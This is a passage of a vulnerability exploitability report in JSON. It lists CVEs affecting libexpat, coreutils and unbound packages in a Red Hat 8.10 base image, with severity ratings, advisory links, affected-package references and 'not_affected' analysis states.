          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56131",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_ResumeParser from within handlers in cases of a policy violation. Thus, a use-after-free can occur (similar to the CVE-2026-50219 situation).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56131"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56131"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1267"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56131"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56131"
        }
      ],
      "published": "2026-06-19T06:17:10+00:00",
      "updated": "2026-06-23T20:15:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56132",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        821
      ],
      "description": "In libexpat before 2.8.2, there is a heap-based buffer overflow in doProlog in xmlparse.c because scaffold backing array reallocation is mishandled when there is data-structure sharing across parsers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56132"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56132"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1272"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56132"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56132"
        }
      ],
      "published": "2026-06-19T06:17:10+00:00",
      "updated": "2026-06-23T20:15:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56391",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "GNU coreutils uniq is vulnerable to an out\u2011of\u2011bounds read due to incorrect handling of multibyte input when the -w (--check-chars) option is used. The find_field() function miscalculates the byte length of characters by repeatedly processing a fixed pointer instead of advancing through the input, resulting in an inflated length value. \nThis incorrect length is later used in a memcmp operation, causing reads beyond the allocated buffer when processing crafted multibyte input.\n\nWhen running GNU coreutils uniq with attacker-provided arguments, this behavior leads to a crash and potential adjacent heap memory exposure.\n\n\nThis issue has been fixed in the commit d64e35a8a4c0e4608321433e0d84d917e4e36371.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56391"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56391"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=d64e35a8a4c0e4608321433e0d84d917e4e36371"
        },
        {
          "url": "https://github.com/advisories/GHSA-7xvj-m9x7-qgxq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56391"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56391"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.30-17.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56392",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU coreutils unexpand is vulnerable to a heap-based buffer overflow due to an integer overflow during buffer allocation when processing large tab stop (-t) values. The multiplication used to calculate the allocation size can wrap around, resulting in an undersized buffer.\nWhen processing crafted input, subsequent writes exceed the allocated memory, leading to an out\u2011of\u2011bounds heap write.\n\nWhen running GNU coreutils unexpand with attacker-provided large tab stop (-t) arguments, this behavior leads to a crash and potentially achieve a heap write primitive depending on memory layout.\n\n\n\n\n\n\n\n\n\n\nThis issue has been fixed in the commit b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d",
      "recommendation": "Upgrade coreutils-single to version 8.30-20.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56392"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56392"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-56391"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=b60a159fdc5bfcf9988d3a4cb6f53abe8ad5d35d"
        },
        {
          "url": "https://github.com/advisories/GHSA-g24f-m2hx-pfgx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56392"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56392"
        }
      ],
      "published": "2026-07-24T09:16:25+00:00",
      "updated": "2026-07-30T16:28:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.30-17.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
